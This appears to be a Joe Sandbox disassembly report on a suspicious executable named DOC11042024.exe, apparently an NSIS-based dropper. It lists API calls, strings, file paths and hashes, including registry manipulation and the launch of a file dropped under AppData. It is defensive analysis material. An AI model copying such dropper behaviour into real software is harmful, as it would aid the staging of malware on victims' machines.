• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 905fcdaa06d317cecc75d2aa53694fa74a3ca27fa6aeb4a7b917f1fdba5fd8d9
• Instruction ID: 210be3f618b2f72b65e92a513b67774d31d2d59722dab59db414347af7fb5456
• Opcode Fuzzy Hash: 905fcdaa06d317cecc75d2aa53694fa74a3ca27fa6aeb4a7b917f1fdba5fd8d9
• Instruction Fuzzy Hash: AA712471D00228DBDF24CFA8C8847ADBBB1FF44305F15806AD856BB281D7385A96DF58
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b9f1c4145ec2734ed8b745e59079d15377436192dd68815ee044f9ae39fff47b
• Instruction ID: b62693dbdd6b91c15498026fd83965cb0e3cd6a47c92dcad7d20d914c94eb84c
• Opcode Fuzzy Hash: b9f1c4145ec2734ed8b745e59079d15377436192dd68815ee044f9ae39fff47b
• Instruction Fuzzy Hash: 46714671E00228DBDF28CF98C844BADBBB1FF44305F15806AD856BB281D7385A56DF58
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 424f2c4f183dead9941b158fa2fff84b988b4c1f9a0ebf82131d7c21771ae00e
• Instruction ID: ccc624a3f951c5fd038c8a3f5e05dbaad7a961e7b6384742e379747c2412857a
• Opcode Fuzzy Hash: 424f2c4f183dead9941b158fa2fff84b988b4c1f9a0ebf82131d7c21771ae00e
• Instruction Fuzzy Hash: F4714671E00228DBDF28CF98C844BADBBB1FF44305F15806AD856BB281D7786A56DF58
APIs
• GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FC3
  • Part of subcall function 00405156: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000,?), ref: 0040518E
  • Part of subcall function 00405156: lstrlenW.KERNEL32(00402D2A,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000), ref: 0040519E
  • Part of subcall function 00405156: lstrcatW.KERNEL32(Completed,00402D2A,00402D2A,Completed,00000000,00000000,00000000), ref: 004051B1
  • Part of subcall function 00405156: SetWindowTextW.USER32(Completed,Completed), ref: 004051C3
  • Part of subcall function 00405156: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004051E9
  • Part of subcall function 00405156: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405203
  • Part of subcall function 00405156: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405211
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
• FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
Similarity
• API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
• String ID:
• API String ID: 334405425-0
APIs
  • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402481
• RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402494
• RegCloseKey.ADVAPI32(?,?,?,anagallis\salpetersyrlingens\Derrieres,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
Joe Sandbox IDA Plugin
Similarity
• API ID: Enum$CloseOpenValue
• String ID:
• API String ID: 167947723-0
APIs
• ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213,?), ref: 00401E3D
Strings
• C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213, xrefs: 00401E26
Joe Sandbox IDA Plugin
Similarity
• API ID: ExecuteShell
• String ID: C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213
• API String ID: 587946157-2216720624
APIs
  • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
• RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
• RegCloseKey.ADVAPI32(?,?,?,anagallis\salpetersyrlingens\Derrieres,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
Joe Sandbox IDA Plugin
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
APIs
  • Part of subcall function 00405EA2: lstrcpynW.KERNEL32(?,?,00000400,0040338A,004281E0,NSIS Error), ref: 00405EAF
  • Part of subcall function 004059B5: CharNextW.USER32(?,?,00424ED8,?,00405A29,00424ED8,00424ED8,?,?,75922EE0,00405751,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004059C3
  • Part of subcall function 004059B5: CharNextW.USER32(00000000), ref: 004059C8
  • Part of subcall function 004059B5: CharNextW.USER32(00000000), ref: 004059E0
• lstrlenW.KERNEL32(00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405751,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 00405A6B
• GetFileAttributesW.KERNELBASE(00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405751,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00405A7B
Joe Sandbox IDA Plugin
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID:
• API String ID: 3248276644-0
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
Joe Sandbox IDA Plugin
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
  • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
• RegCloseKey.ADVAPI32(00000000), ref: 004022FB
Joe Sandbox IDA Plugin
Similarity
• API ID: CloseDeleteOpenValue
• String ID:
• API String ID: 849931509-0
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 53ab543b298178f50251b2459bb562450a1dd7924065fa5eff0ceb5091c56aa8
• Instruction ID: 80e76f6a688c62747686e25d0ca61306c2f631b5b0eee649f6067f2527668ce1
• Opcode Fuzzy Hash: 53ab543b298178f50251b2459bb562450a1dd7924065fa5eff0ceb5091c56aa8
• Instruction Fuzzy Hash: 43E08672B04115DBCB24DBA8ED908BD77A5EB44310754447FE902B32D0C6759C12CF38

APIs
• ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
• EnableWindow.USER32(00000000,00000000), ref: 00401DE8
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
• Opcode ID: e9060f6b245a37f56f57398021f8afda1d99aae150a2646af934d03bf3ace4fd
• Instruction ID: 28e908a6165a13ae20b5456a54398491662dd313bd445d62b915cc3bb3bf236f
• Opcode Fuzzy Hash: e9060f6b245a37f56f57398021f8afda1d99aae150a2646af934d03bf3ace4fd
• Instruction Fuzzy Hash: C8E08C72B04110DBDB21BBA4AA8859D7264EB50369B1005BBF402F10D2C6B85C42DA3E

APIs
• GetFileAttributesW.KERNELBASE(00000003,00402D95,00437800,80000000,00000003), ref: 00405B2F
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B51
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
• Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
• Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
• Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16

APIs
• GetFileAttributesW.KERNELBASE(?,?,004056F5,?,?,00000000,004058E1,?,?,?,?), ref: 00405B0B
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B1F
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
• Instruction ID: 8113dfa97b81082f8cf2b73423fd644a7912fc485d929263289a92eefa3d8618
• Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
• Instruction Fuzzy Hash: DAD01272908020AFD2102728FE0C89BBF65DB543717018B31FD75A22F0C7305C52CAB6

APIs
• MoveFileW.KERNEL32(00000000,00000000), ref: 00401679
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: FileMove
• String ID:
• API String ID: 3562171763-0
• Opcode ID: 8fe79ce3c2b313a95c379856455a1f2e01201a62c76f8117580e46350af60910
• Instruction ID: 5e5934034a73616b7c5c936e1d535abeea833b9c873949bf5210412842da6fbc
• Opcode Fuzzy Hash: 8fe79ce3c2b313a95c379856455a1f2e01201a62c76f8117580e46350af60910
• Instruction Fuzzy Hash: 13F05435708121E2CB20B7B55F4DE9E25A4DF42368F24073BF123B61D1DAFD8942966E

APIs
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
• Opcode ID: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
• Instruction ID: 4d522e8bde3653b981076e9042a854f7c5429d371814473e34f0fcc773409074
• Opcode Fuzzy Hash: ff37467d196542fb058f015d684c25ad389eeca81ff6bef522b3f91f96979ab6
• Instruction Fuzzy Hash: CAE0E632A041696ADB2036F20E8DD7F3058DB54754F15057FB513BA2C2DDFC0D815AAD

APIs
• RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
• Instruction ID: b0bbdecf46b64206e012d84e5d9e673a6d3cc271936ee21996476f731e1d4893
• Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
• Instruction Fuzzy Hash: 12E0B676290108BADB11EFA5ED4AFA577ECEB08705F108425BA09E6091D674F5508BAC

APIs
• ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00413E78,0040BE78,004031A4,00413E78,00004000,?,00000000,?,0040302E,00000004,00000000,00000000), ref: 004032B6
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 476de8a6d54054254eaeab11a76a7e936c9490da6f321b020811133c829fda6c
• Instruction ID: 88158c925b015a47486c1d05f200f8b2f8795a110b6c7e6efd1e7249e7db3a8e
• Opcode Fuzzy Hash: 476de8a6d54054254eaeab11a76a7e936c9490da6f321b020811133c829fda6c
• Instruction Fuzzy Hash: 1AE0863512411DBBCF205E619C00AE73B5CEB05761F00C076F908E5290D130DA059BA4

APIs
• SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040414F
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• SendMessageW.USER32(00000028,?,00000001,00403F52), ref: 00404134
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F7D,?), ref: 004032DF
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,00403EEB), ref: 0040411D
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404AEA
• GetDlgItem.USER32(?,00000408), ref: 00404AF5
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404B3F
• LoadBitmapW.USER32(0000006E), ref: 00404B52
• SetWindowLongW.USER32(?,000000FC,004050CA), ref: 00404B6B
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B7F
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B91
• SendMessageW.USER32(?,00001109,00000002), ref: 00404BA7
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BB3
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BC5
• DeleteObject.GDI32(00000000), ref: 00404BC8
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404BF3
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404BFF
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404C95
• SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CC0
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD4
• GetWindowLongW.USER32(?,000000F0), ref: 00404D03
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D11
• ShowWindow.USER32(?,00000005), ref: 00404D22
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E1F
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404E84
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404E99
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EBD
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404EDD
• ImageList_Destroy.COMCTL32(?), ref: 00404EF2
• GlobalFree.KERNEL32(?), ref: 00404F02
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F7B
• SendMessageW.USER32(?,00001102,?,?), ref: 00405024
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405033
• InvalidateRect.USER32(?,00000000,00000001), ref: 00405053
• ShowWindow.USER32(?,00000000), ref: 004050A1
• GetDlgItem.USER32(?,000003FE), ref: 004050AC
• ShowWindow.USER32(00000000), ref: 004050B3
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 1638840714-813528018
APIs
• GetDlgItem.USER32(?,000003FB), ref: 004045DB
• SetWindowTextW.USER32(00000000,?), ref: 00404605
• SHBrowseForFolderW.SHELL32(?), ref: 004046B6
• CoTaskMemFree.OLE32(00000000), ref: 004046C1
• lstrcmpiW.KERNEL32(: Completed,004226D0,00000000,?,?), ref: 004046F3
• lstrcatW.KERNEL32(?,: Completed), ref: 004046FF
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404711
  • Part of subcall function 00405669: GetDlgItemTextW.USER32(?,?,00000400,00404748), ref: 0040567C
  • Part of subcall function 00406136: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\DOC11042024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 00406199
  • Part of subcall function 00406136: CharNextW.USER32(?,?,?,00000000), ref: 004061A8
  • Part of subcall function 00406136: CharNextW.USER32(?,"C:\Users\user\Desktop\DOC11042024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 004061AD
  • Part of subcall function 00406136: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 004061C0
• GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 004047D2
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047ED
• SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 00404873
Memory Dump Source
• Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                              • String ID: rigges$$: Completed$A$C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213
                                                                              • API String ID: 2246997448-1824939656
                                                                              • Opcode ID: ffba0203ec50202fd1af591eaf61cd09a0f818d728380bfdba4095b3e374861e
                                                                              • Instruction ID: c097c63a260b80efcb898137ead4bfbcbebfeaf6c04a2c0b6202ccd030b94cdc
                                                                              • Opcode Fuzzy Hash: ffba0203ec50202fd1af591eaf61cd09a0f818d728380bfdba4095b3e374861e
                                                                              • Instruction Fuzzy Hash: 6E916DB1900209ABDB10AFA5CD85AAF77B8EF85314F14843BF701B72D1D77C99418B69
                                                                              APIs
                                                                              • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 0040575A
                                                                              • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004057A2
                                                                              • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004057C5
                                                                              • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004057CB
                                                                              • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004057DB
                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,?,?,0000003F), ref: 0040588F
                                                                              • FindClose.KERNEL32(00000000), ref: 004058A0
                                                                              Strings
                                                                              • \*.*, xrefs: 0040579C
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040573F
                                                                              • "C:\Users\user\Desktop\DOC11042024.exe", xrefs: 0040573A
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: "C:\Users\user\Desktop\DOC11042024.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                              • API String ID: 2035342205-1391847534
                                                                              • Opcode ID: 8d48512ec1d4757742382f020f1413c2ca8bd04e3c6df695603448cbd25ae85b
                                                                              • Instruction ID: ab14c35d66287b7d119f087b0e90261104e6fcf4636a4d17e295c7c72c5a2f22
                                                                              • Opcode Fuzzy Hash: 8d48512ec1d4757742382f020f1413c2ca8bd04e3c6df695603448cbd25ae85b
                                                                              • Instruction Fuzzy Hash: DC517D31801A04EADB217B618C49AAF7778EF41754F50853BF811B62D1D73C8A91DEAD
                                                                              APIs
                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040432C
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404340
                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040435D
                                                                              • GetSysColor.USER32(?), ref: 0040436E
                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040437C
                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040438A
                                                                              • lstrlenW.KERNEL32(?), ref: 0040438F
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040439C
                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043B1
                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040440A
                                                                              • SendMessageW.USER32(00000000), ref: 00404411
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040443C
                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040447F
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040448D
                                                                              • SetCursor.USER32(00000000), ref: 00404490
                                                                              • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044A5
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004044B1
                                                                              • SetCursor.USER32(00000000), ref: 004044B4
                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044E3
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044F5
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                              • String ID: : Completed$N$open
                                                                              • API String ID: 3615053054-3069340868
                                                                              • Opcode ID: 395f1e8a341a3acf8d3ab52297caf912081d7b5e1a6eee8845e5d3297dd08754
                                                                              • Instruction ID: ed61b046ed3f7b6d336d11d2103cb915c13d96dbd797c0acb536c938d6378b8e
                                                                              • Opcode Fuzzy Hash: 395f1e8a341a3acf8d3ab52297caf912081d7b5e1a6eee8845e5d3297dd08754
                                                                              • Instruction Fuzzy Hash: 927192B1A00209FFDB109F60DD85A6A7B69FB44354F00803AFB05B62D1C778AD61CFA9
                                                                              APIs
                                                                              • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405D64,?,?,00000001,004058F9,?,00000000,000000F1,?), ref: 00405BBE
                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405D64,?,?,00000001,004058F9,?,00000000,000000F1,?), ref: 00405BE2
                                                                              • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405BEB
                                                                                • Part of subcall function 00405A90: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405CAD,00000000,[Rename]), ref: 00405AA0
                                                                                • Part of subcall function 00405A90: lstrlenA.KERNEL32(?,?,00000000,00405CAD,00000000,[Rename]), ref: 00405AD2
                                                                              • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C08
                                                                              • wsprintfA.USER32 ref: 00405C26
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405C61
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405C70
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405C8A
                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00405CBA
